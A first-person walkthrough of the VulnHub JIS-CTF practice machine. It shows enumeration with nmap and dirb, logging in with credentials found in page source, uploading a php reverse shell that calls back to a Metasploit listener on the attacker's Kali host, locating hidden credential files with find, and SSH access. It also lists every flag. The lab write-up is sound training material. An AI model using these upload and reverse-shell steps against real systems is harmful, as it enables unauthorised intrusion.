CTF Solution: JIS-CTF


 

Link to the VirtualBox download: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

Goal: 5 flags

Step 1: Loading my Kali and the CTF on VirtualBox.
I chose to put both on their own subnet.

Kali IP: 192.168.56.102

Step 2: Discovering CTF IP
netdiscover

CTF IP is 192.168.56.101

Step 3: Enumerating with nmap

nmap -Pn -p- -sV 192.168.56.101

Open ports:

22 ssh

80 http

Step 4: Scanning the web server

dirb http://192.168.56.101

Lots of files and directories there -let’s explore them one by one…

Step 5: Exploring /admin_area/

This is the page-

And the source shows-

That’s the second flag – so I’ve probably missed something even more obvious and write in my face!

Flag: 7412574125871236547895214

Found: #2

Looking for: #1, #3, #4, and #5

and there’s the admin username and password: 3v1l_H@ck3r

We’ll make a note of that and return to it in time…

Step 6: Exploring /flag/

Yes, I probably should have come here first – it is called “flag” !

Flag: 8734509128730458630012095

Found: #1, #2

Looking for: #3, #4, and #5

Step 7:  Exploring /robots.txt/

I systematically tried loading each file – but nothing new showed up.

Step 8: Exploring /index.php

It redirects to /login.php

And yes, we can login with the creds found in Step 5

username: admin 

password: 3v1l_H@ck3r

and we’re in-

The Browse button allows for an upload of any type of file, so let’s attempt to upload a php reverse shell, shall we?

Step 9: Uploading a php reverse shell

The Kali box has shell scripts stored in-

/usr/share/webshells

I changed the IP and port in the php-reverse-shell.php file-

And uploaded it successfully.

Step 10: Exploitation – firing up Metasploit

use multi/handler

set payload linux/x86/shell/reverse_tcp

set LHOST 192.168.56.102

set LPORT 55555

exploit

and browsing to /uploaded_files/php-reverse-shell.php

and yes, Metasploit gave us a shell!

lots of cd and ls commands, and finally-

cat flag.txt doesn’t work

But cat hint.txt does !

We have our third flag-

Flag: 7645110034526579012345670

Found: #1, #2, #3

Looking for: #4 and #5

and we have a hint:

Try to find user technawi password to read the flag.txt file, you can find it in a hidden file 😉

Step 10: Grep

After a lot of trial and error with grep, to utilize the hint and find technawi’s hidden file, I hit gold with-

$ find / -user technawi -type f 2>&1 | grep -v “Permission” | grep -v “No such”

Step 11: Inspecting /etc/mysql/cpnf.d/crendentials.txt

cat /etc/mysql/cpnf.d/crendentials.txt

Our fourth flag-

Flag: 7845658974123568974185412

Found: #1, #2, #3, #4

Looking for: #5

and credentials to open flag.txt, which presumably has the fifth and last flag

username: technawi

password: 3vilH@ksor

Step 12: SSH as technawi

Step 3 had shown us the port 22 – SSH was open.

ssh technawi@192.168.56.101

password: 3vilH@ksor

lets us in!

Step 13: Inspecting /var/www/html/flag.txt

cat /var/www/html/flag.txt

And yes, our fifth and final flag!

Flag: 5473215946785213456975249

Found: #1, #2, #3, #4, #5

All done!

If there’s one thing this CTF taught me => I definitely need to brush up on my grep!

Tool and commands used-

  • nmap
  • dirb
  • php reverse shell
  • metasploit
  • grep
  • ssh